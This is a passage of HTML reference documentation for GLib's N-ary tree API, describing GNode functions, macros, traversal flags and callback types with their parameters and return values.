<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202449"></a><h3>
<a name="g-node-prepend-data"></a>g_node_prepend_data()</h3>
<a class="indexterm" name="id3202462"></a><pre class="programlisting">#define g_node_prepend_data(parent, data)</pre>
<p>
Inserts a new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> as the first child of the given parent.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>parent</code></em> :</span></td>
<td>the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> to place the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> under.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data for the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the new <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202561"></a><h3>
<a name="g-node-reverse-children"></a>g_node_reverse_children ()</h3>
<a class="indexterm" name="id3202574"></a><pre class="programlisting">void g_node_reverse_children (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Reverses the order of the children of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
(It doesn't change the order of the grandchildren.)
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody><tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr></tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202638"></a><h3>
<a name="g-node-traverse"></a>g_node_traverse ()</h3>
<a class="indexterm" name="id3202650"></a><pre class="programlisting">void g_node_traverse (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root,
<a href="glib-Balanced-Binary-Trees.html#GTraverseType">GTraverseType</a> order,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-Basic-Types.html#gint">gint</a> max_depth,
<a href="glib-N-ary-Trees.html#GNodeTraverseFunc">GNodeTraverseFunc</a> func,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Traverses a tree starting at the given root <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
It calls the given function for each node visited.
The traversal can be halted at any point by returning <a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> from <em class="parameter"><code>func</code></em>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>root</code></em> :</span></td>
<td>the root <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> of the tree to traverse.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>order</code></em> :</span></td>
<td>the order in which nodes are visited - <a href="glib-Balanced-Binary-Trees.html#G-IN-ORDER:CAPS"><code class="literal">G_IN_ORDER</code></a>, <a href="glib-Balanced-Binary-Trees.html#G-PRE-ORDER:CAPS"><code class="literal">G_PRE_ORDER</code></a>,
<a href="glib-Balanced-Binary-Trees.html#G-POST-ORDER:CAPS"><code class="literal">G_POST_ORDER</code></a>, or <a href="glib-Balanced-Binary-Trees.html#G-LEVEL-ORDER:CAPS"><code class="literal">G_LEVEL_ORDER</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>flags</code></em> :</span></td>
<td>which types of children are to be visited, one of <a href="glib-N-ary-Trees.html#G-TRAVERSE-ALL:CAPS"><code class="literal">G_TRAVERSE_ALL</code></a>,
<a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAVES:CAPS"><code class="literal">G_TRAVERSE_LEAVES</code></a> and <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAVES:CAPS"><code class="literal">G_TRAVERSE_NON_LEAVES</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>max_depth</code></em> :</span></td>
<td>the maximum depth of the traversal. Nodes below this
depth will not be visited. If max_depth is -1 all nodes in the tree are
visited. If depth is 1, only the root is visited. If depth is 2, the root
and its children are visited. And so on.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>func</code></em> :</span></td>
<td>the function to call for each visited <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>user data to pass to the function.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3202931"></a><h3>
<a name="GTraverseFlags"></a>enum GTraverseFlags</h3>
<a class="indexterm" name="id3202944"></a><pre class="programlisting">typedef enum
{
G_TRAVERSE_LEAVES = 1 << 0,
G_TRAVERSE_NON_LEAVES = 1 << 1,
G_TRAVERSE_ALL = G_TRAVERSE_LEAVES | G_TRAVERSE_NON_LEAVES,
G_TRAVERSE_MASK = 0x03,
G_TRAVERSE_LEAFS = G_TRAVERSE_LEAVES,
G_TRAVERSE_NON_LEAFS = G_TRAVERSE_NON_LEAVES
} GTraverseFlags;
</pre>
<p>
Specifies which nodes are visited during several of the tree functions,
including <a href="glib-N-ary-Trees.html#g-node-traverse"><code class="function">g_node_traverse()</code></a> and <a href="glib-N-ary-Trees.html#g-node-find"><code class="function">g_node_find()</code></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><a name="G-TRAVERSE-LEAVES:CAPS"></a><code class="literal">G_TRAVERSE_LEAVES</code></span></td>
<td>only leaf nodes should be visited. This name has been
introduced in 2.6, for older version use <a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAFS:CAPS"><code class="literal">G_TRAVERSE_LEAFS</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><a name="G-TRAVERSE-NON-LEAVES:CAPS"></a><code class="literal">G_TRAVERSE_NON_LEAVES</code></span></td>
<td>only non-leaf nodes should be visited. This name
has been introduced in 2.6, for older version use <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAFS:CAPS"><code class="literal">G_TRAVERSE_NON_LEAFS</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><a name="G-TRAVERSE-ALL:CAPS"></a><code class="literal">G_TRAVERSE_ALL</code></span></td>
<td>all nodes should be visited.
</td>
</tr>
<tr>
<td><span class="term"><a name="G-TRAVERSE-MASK:CAPS"></a><code class="literal">G_TRAVERSE_MASK</code></span></td>
<td>
</td>
</tr>
<tr>
<td><span class="term"><a name="G-TRAVERSE-LEAFS:CAPS"></a><code class="literal">G_TRAVERSE_LEAFS</code></span></td>
<td>identical to <a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAVES:CAPS"><code class="literal">G_TRAVERSE_LEAVES</code></a>
</td>
</tr>
<tr>
<td><span class="term"><a name="G-TRAVERSE-NON-LEAFS:CAPS"></a><code class="literal">G_TRAVERSE_NON_LEAFS</code></span></td>
<td>identical to <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAVES:CAPS"><code class="literal">G_TRAVERSE_NON_LEAVES</code></a>
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3203173"></a><h3>
<a name="GNodeTraverseFunc"></a>GNodeTraverseFunc ()</h3>
<a class="indexterm" name="id3203187"></a><pre class="programlisting"><a href="glib-Basic-Types.html#gboolean">gboolean</a> (*GNodeTraverseFunc) (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Specifies the type of function passed to <a href="glib-N-ary-Trees.html#g-node-traverse"><code class="function">g_node_traverse()</code></a>.
The function is called with each of the nodes visited, together with the
user data passed to <a href="glib-N-ary-Trees.html#g-node-traverse"><code class="function">g_node_traverse()</code></a>.
If the function returns <a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a>, then the traversal is stopped.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>user data passed to <a href="glib-N-ary-Trees.html#g-node-traverse"><code class="function">g_node_traverse()</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>
<a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> to stop the traversal.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3203326"></a><h3>
<a name="g-node-children-foreach"></a>g_node_children_foreach ()</h3>
<a class="indexterm" name="id3203340"></a><pre class="programlisting">void g_node_children_foreach (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-N-ary-Trees.html#GNodeForeachFunc">GNodeForeachFunc</a> func,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Calls a function for each of the children of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
Note that it doesn't descend beneath the child nodes.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>flags</code></em> :</span></td>
<td>which types of children are to be visited, one of <a href="glib-N-ary-Trees.html#G-TRAVERSE-ALL:CAPS"><code class="literal">G_TRAVERSE_ALL</code></a>,
<a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAVES:CAPS"><code class="literal">G_TRAVERSE_LEAVES</code></a> and <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAVES:CAPS"><code class="literal">G_TRAVERSE_NON_LEAVES</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>func</code></em> :</span></td>
<td>the function to call for each visited node.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>user data to pass to the function.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3203502"></a><h3>
<a name="GNodeForeachFunc"></a>GNodeForeachFunc ()</h3>
<a class="indexterm" name="id3203515"></a><pre class="programlisting">void (*GNodeForeachFunc) (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Specifies the type of function passed to <a href="glib-N-ary-Trees.html#g-node-children-foreach"><code class="function">g_node_children_foreach()</code></a>.
The function is called with each child node, together with the user data
passed to <a href="glib-N-ary-Trees.html#g-node-children-foreach"><code class="function">g_node_children_foreach()</code></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>user data passed to <a href="glib-N-ary-Trees.html#g-node-children-foreach"><code class="function">g_node_children_foreach()</code></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3203626"></a><h3>
<a name="g-node-get-root"></a>g_node_get_root ()</h3>
<a class="indexterm" name="id3203638"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_get_root (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Gets the root of a tree.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the root of the tree.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3203703"></a><h3>
<a name="g-node-find"></a>g_node_find ()</h3>
<a class="indexterm" name="id3203715"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_find (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root,
<a href="glib-Balanced-Binary-Trees.html#GTraverseType">GTraverseType</a> order,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Finds a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> in a tree.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>root</code></em> :</span></td>
<td>the root <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> of the tree to search.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>order</code></em> :</span></td>
<td>the order in which nodes are visited - <a href="glib-Balanced-Binary-Trees.html#G-IN-ORDER:CAPS"><code class="literal">G_IN_ORDER</code></a>, <a href="glib-Balanced-Binary-Trees.html#G-PRE-ORDER:CAPS"><code class="literal">G_PRE_ORDER</code></a>,
<a href="glib-Balanced-Binary-Trees.html#G-POST-ORDER:CAPS"><code class="literal">G_POST_ORDER</code></a>, or <a href="glib-Balanced-Binary-Trees.html#G-LEVEL-ORDER:CAPS"><code class="literal">G_LEVEL_ORDER</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>flags</code></em> :</span></td>
<td>which types of children are to be searched, one of <a href="glib-N-ary-Trees.html#G-TRAVERSE-ALL:CAPS"><code class="literal">G_TRAVERSE_ALL</code></a>,
<a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAVES:CAPS"><code class="literal">G_TRAVERSE_LEAVES</code></a> and <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAVES:CAPS"><code class="literal">G_TRAVERSE_NON_LEAVES</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data to find.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the found <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>, or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if the data is not found.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3203947"></a><h3>
<a name="g-node-find-child"></a>g_node_find_child ()</h3>
<a class="indexterm" name="id3203960"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_find_child (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GTraverseFlags">GTraverseFlags</a> flags,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Finds the first child of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> with the given data.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>flags</code></em> :</span></td>
<td>which types of children are to be searched, one of <a href="glib-N-ary-Trees.html#G-TRAVERSE-ALL:CAPS"><code class="literal">G_TRAVERSE_ALL</code></a>,
<a href="glib-N-ary-Trees.html#G-TRAVERSE-LEAVES:CAPS"><code class="literal">G_TRAVERSE_LEAVES</code></a> and <a href="glib-N-ary-Trees.html#G-TRAVERSE-NON-LEAVES:CAPS"><code class="literal">G_TRAVERSE_NON_LEAVES</code></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data to find.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the found child <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>, or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if the data is not found.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204128"></a><h3>
<a name="g-node-child-index"></a>g_node_child_index ()</h3>
<a class="indexterm" name="id3204142"></a><pre class="programlisting"><a href="glib-Basic-Types.html#gint">gint</a> g_node_child_index (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#gpointer">gpointer</a> data);</pre>
<p>
Gets the position of the first child of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> which contains the given data.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>data</code></em> :</span></td>
<td>the data to find.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the index of the child of <em class="parameter"><code>node</code></em> which contains <em class="parameter"><code>data</code></em>, or -1
if the data is not found.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204249"></a><h3>
<a name="g-node-child-position"></a>g_node_child_position ()</h3>
<a class="indexterm" name="id3204262"></a><pre class="programlisting"><a href="glib-Basic-Types.html#gint">gint</a> g_node_child_position (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-N-ary-Trees.html#GNode">GNode</a> *child);</pre>
<p>
Gets the position of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> with respect to its siblings.
<em class="parameter"><code>child</code></em> must be a child of <em class="parameter"><code>node</code></em>.
The first child is numbered 0, the second 1, and so on.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>child</code></em> :</span></td>
<td>a child of <em class="parameter"><code>node</code></em>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the position of <em class="parameter"><code>child</code></em> with respect to its siblings.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204382"></a><h3>
<a name="g-node-first-child"></a>g_node_first_child()</h3>
<a class="indexterm" name="id3204396"></a><pre class="programlisting">#define g_node_first_child(node)</pre>
<p>
Gets the first child of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the last child of <em class="parameter"><code>node</code></em>, or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if <em class="parameter"><code>node</code></em> is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> or has no children.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204488"></a><h3>
<a name="g-node-last-child"></a>g_node_last_child ()</h3>
<a class="indexterm" name="id3204501"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_last_child (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Gets the last child of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> (must not be <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a>).
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the last child of <em class="parameter"><code>node</code></em>, or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if <em class="parameter"><code>node</code></em> has no children.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204606"></a><h3>
<a name="g-node-nth-child"></a>g_node_nth_child ()</h3>
<a class="indexterm" name="id3204619"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_nth_child (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node,
<a href="glib-Basic-Types.html#guint">guint</a> n);</pre>
<p>
Gets a child of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>, using the given index.
The first child is at index 0. If the index is too big, <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> is returned.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><em class="parameter"><code>n</code></em> :</span></td>
<td>the index of the desired child.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the child of <em class="parameter"><code>node</code></em> at index <em class="parameter"><code>n</code></em>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204736"></a><h3>
<a name="g-node-first-sibling"></a>g_node_first_sibling ()</h3>
<a class="indexterm" name="id3204749"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_first_sibling (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Gets the first sibling of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
This could possibly be the node itself.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the first sibling of <em class="parameter"><code>node</code></em>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204828"></a><h3>
<a name="g-node-next-sibling"></a>g_node_next_sibling()</h3>
<a class="indexterm" name="id3204842"></a><pre class="programlisting">#define g_node_next_sibling(node)</pre>
<p>
Gets the next sibling of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the next sibling of <em class="parameter"><code>node</code></em>, or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if <em class="parameter"><code>node</code></em> is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3204934"></a><h3>
<a name="g-node-prev-sibling"></a>g_node_prev_sibling()</h3>
<a class="indexterm" name="id3204948"></a><pre class="programlisting">#define g_node_prev_sibling(node)</pre>
<p>
Gets the previous sibling of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the previous sibling of <em class="parameter"><code>node</code></em>, or <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> if <em class="parameter"><code>node</code></em> is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205040"></a><h3>
<a name="g-node-last-sibling"></a>g_node_last_sibling ()</h3>
<a class="indexterm" name="id3205053"></a><pre class="programlisting"><a href="glib-N-ary-Trees.html#GNode">GNode</a>* g_node_last_sibling (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Gets the last sibling of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
This could possibly be the node itself.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the last sibling of <em class="parameter"><code>node</code></em>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205132"></a><h3>
<a name="G-NODE-IS-LEAF:CAPS"></a>G_NODE_IS_LEAF()</h3>
<a class="indexterm" name="id3205144"></a><pre class="programlisting">#define G_NODE_IS_LEAF(node) (((GNode*) (node))->children == NULL)
</pre>
<p>
Returns <a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> is a leaf node.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>
<a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> is a leaf node (i.e. it has no children).
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205233"></a><h3>
<a name="G-NODE-IS-ROOT:CAPS"></a>G_NODE_IS_ROOT()</h3>
<a class="indexterm" name="id3205246"></a><pre class="programlisting">#define G_NODE_IS_ROOT(node)</pre>
<p>
Returns <a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> is the root of a tree.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>
<a href="glib-Standard-Macros.html#TRUE:CAPS"><code class="literal">TRUE</code></a> if the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a> is the root of a tree (i.e. it has no parent
or siblings).
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205334"></a><h3>
<a name="g-node-depth"></a>g_node_depth ()</h3>
<a class="indexterm" name="id3205346"></a><pre class="programlisting"><a href="glib-Basic-Types.html#guint">guint</a> g_node_depth (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *node);</pre>
<p>
Gets the depth of a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</p>
<p>
If <em class="parameter"><code>node</code></em> is <a href="glib-Standard-Macros.html#NULL:CAPS"><code class="literal">NULL</code></a> the depth is 0.
The root node has a depth of 1.
For the children of the root node the depth is 2. And so on.
</p>
<div class="variablelist"><table border="0">
<col align="left" valign="top">
<tbody>
<tr>
<td><span class="term"><em class="parameter"><code>node</code></em> :</span></td>
<td>a <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
<tr>
<td><span class="term"><span class="emphasis"><em>Returns</em></span> :</span></td>
<td>the depth of the <a href="glib-N-ary-Trees.html#GNode"><span class="type">GNode</span></a>.
</td>
</tr>
</tbody>
</table></div>
</div>
<hr>
<div class="refsect2" lang="en">
<a name="id3205448"></a><h3>
<a name="g-node-n-nodes"></a>g_node_n_nodes ()</h3>
<a class="indexterm" name="id3205460"></a><pre class="programlisting"><a href="glib-Basic-Types.html#guint">guint</a> g_node_n_nodes (<a href="glib-N-ary-Trees.html#GNode">GNode</a> *root,
